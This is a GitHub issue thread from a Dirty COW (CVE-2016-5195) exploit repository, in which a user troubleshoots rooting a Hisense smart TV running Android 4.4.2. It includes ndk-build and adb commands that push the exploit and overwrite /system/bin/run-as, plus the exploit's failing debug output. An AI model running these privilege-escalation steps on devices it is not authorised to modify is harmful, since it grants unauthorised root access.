CVE-2016-5195

warning: new file size and destination file size differ, ptrace I/O error

Open IanBoyanZhang opened this issue 5 years ago • 2 comments

I am trying to gain limited root access on a Hisense vidaa4 running Android 4.4.2.

Have tried to build using SDK v19, v18, v14.

New file size is always 13788.

Thank you

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-18
make[1]: Entering directory `/Users/idefixthegrand/Workspace/CVE-2016-5195'
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory `/Users/idefixthegrand/Workspace/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file pushed. 0.5 MB/s (17884 bytes in 0.034s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
libs/armeabi-v7a/run-as: 1 file pushed. 0.3 MB/s (13788 bytes in 0.041s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (13788) and destination file size (9432) differ

corruption?

[*] size 13788
[*] mmap 0xb6ef4000
[*] currently 0xb6ef4000=464c457f
[*] using ptrace method
[*] madvise = 0xb6ef4000 13788
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error

IanBoyanZhang, Nov 08 '18 10:11

Can you try using the armeabi version of run-as? Everything else should be armeabi-v7a.

timwr, Nov 08 '18 11:11

Tried to use the armeabi run-as:

adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'


dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (9432) differ

[*] size 9432
[*] mmap 0xb6f0a000
[*] currently 0xb6f0a000=464c457f
[*] using /proc/self/mem method
[*] madvise = 0xb6f0a000 9432
[*] madvise = 0 2
[*] /proc/self/mem 0 0
[*] exploited 0 0xb6f0a000=464c457f

adb shell /system/bin/run-as

uid /system/bin/run-as 2000
setresgid/setresuid failed
uid 2000

Guess I should refer to this issue.

Thank you.

IanBoyanZhang, Nov 09 '18 00:11